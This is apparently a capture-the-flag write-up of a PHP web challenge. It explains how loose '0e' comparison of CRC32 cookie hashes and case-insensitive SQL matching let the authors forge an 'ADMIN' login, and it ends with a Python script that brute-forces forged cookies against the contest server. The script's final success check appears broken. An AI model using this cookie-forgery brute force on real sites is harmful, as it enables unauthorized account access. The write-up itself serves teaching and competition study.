Skip to content Skip to navigation

Web 200

Category: 

The sense of this task is to login with user which idx=1. But we don't know, who has this idx

The algoritm for cookie is CRCR32 and this is strange. Because this hash purpose is not for crypto, it's for checksums. But for first try code of server look's good enough. REALY THANK TO ORGS, BECAUSE CODE IS GREAT AND SIMPLE, SO IT'S REALY EASY TO UNDERSTAND THE LOGIC OF SERVER

After reading some manuals we decided that the vuln is in hash. And found post about comparison issues in php whith float string

Php is not strongly typed, and that's why there is some magic with comprassions, and one of them is casting both string to float if they look like float. For example:

	if ("0e12" == "0")
		echo 1;
	else
		echo 2;

This code prints 1!!!! This is magic two different string are equal))

So we decided to brute cookie. We were always sending hash = "0" and different timestamp

Some calculation, we need first symbol to be "0", second "e", and all other is digits. So the probability is 1/16 * 1/16 * (10/16)**6. this is equal to 1/4300, that is not much for online brute

First part was done, we could logged-in with id we want. But what id we need?

After reading code we found this strange

public function islogin(){
			if( preg_match("/[^0-9A-Za-z]/", $_COOKIE['user_name']) ){
	 			exit("cannot be used Special character");
			}

			if( $_COOKIE['user_name'] == "admin" )	return 0;

			$salt = file_get_contents("../../long_salt.txt");

			if( hash('crc32',$salt.'|'.(int)$_COOKIE['login_time'].'|'.$_COOKIE['user_name']) == $_COOKIE['hash'] ){
				return 1;
			}

			return 0;
		}

The 6th string seems to be strange, why id admin is restricred. This is easy to bypass. We just need to login with name in uppercase, because php use case sensetive cmp, but sql not.

So the brute scipt is:

import requests

u1 = "http://219.240.37.153:5959/63972dfdacc8a838f618275d80d27c1d_h/index.php"
for i in xrange(0, 10000000):
    print i
    cookies = {
        "login_time": str(i),
        "user_name": "ADMIN",
        "hash": "0"
    }
    try:
        r = requests.get(u1, cookies=cookies).content
    except:
        continue
    if '' not in r:
        print r
        exit(0)